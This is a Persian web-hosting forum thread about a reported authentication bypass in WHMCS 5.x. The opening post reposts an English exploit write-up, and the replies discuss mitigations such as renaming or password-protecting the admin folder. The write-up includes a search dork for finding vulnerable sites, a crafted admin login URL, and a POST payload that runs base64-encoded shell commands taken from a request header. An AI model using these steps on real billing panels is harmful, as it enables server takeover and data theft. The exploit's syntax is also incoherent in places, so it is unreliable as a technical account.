مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

[secure_host]

با سلام
مشکل امنیتی جدیدی در WHCS ورژن 5 وجود دارد که باعث می شود شخص نفوذگر به صفحه ادمین دسترسی پیدا کند.

راه کار : تا ارایه Patch از ناحیه WHMCS می توانید قابلیت cache-security را در WHMCS خود فعال نمایید . گفتنی است که امکان cache-security به صورت پیش فرض بر روی whmcs 5.1 فعال می باشد.
اطلاعات تکمیلی :
WHMCS 5.x Authentication Bypass - CXSecurity WLB

WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can
be easily bypassed.

##################################################
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 5.x
# Link : Order Now - WHMCS
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################

Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.

# The Fact:

WHMCS
5.0 is completely vulnerable to this vulenrability, but in 5.1 version,
WHMCS has added extra cache-security, so I've added an extra-payload
for it, you can do the exploitation-process without the payload in the
5.0 version.


# The Exploitation

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

after
you have successfully entered that into your browser, the page will lag
for abit due to the cache-validation, which we, ofcourse, will change
it. ;-)


when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to
this:

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redir ect={admin_index}";


# The Result

Once
you have done this process, you will be automatically be redirected to
the admin page, although, if the administrator has enabled
cache-security, this process will fail.

# Solution & Fix

No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.

[i-whost]

تشکر ولی چرا ایمیلی ارسال نشده؟

[kambizmabdi]

سلام
بهترین کار اینه که هم با پنل پوشه ادمین رو روش رمز بزاریم و اسم پوشه هم عوض کنیم.با تشکر

[Ashkankamangar.ir]

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

[CityKala.net]

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

با سلام
فکر نمیکنم احتمالا روی پوشه اجرا میکنند!
اما باز هم یک باز دیگه اسم رو عوض کنید! و رمز جدید بذارید
کار از محکم کاری عیب نمیکند!
ما که تحویل اتوماتیک هم کلا نسلش رو ورداشتیم!

[secure_host]

تشکر ولی چرا ایمیلی ارسال نشده؟

باید من پاسخ گو باشم ؟

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

سلام .خیر

[Reza.exe]

سلام
نوع نفوذ بایپس کردن کوکی و فرستادن هدر های جعلی به سرور هست که اگر شخص آدرس لوگین یا یوزر پسورد فولدر ادمین را داشته باشه می تونه نفوذ کنه

[shivahost]

روی نسخه های 4 چطور؟

[RoobinaServer]

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

سلام

اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.(سیستم آنلاین و ...)

ارادتمند سجادیه
یا حق

[websazha]

سلام
سطح دست رسی پورشه ادمین ما مدتی هست 000 می کنیم نظر جناب رحیمیان در این باب اگر امکان دارند.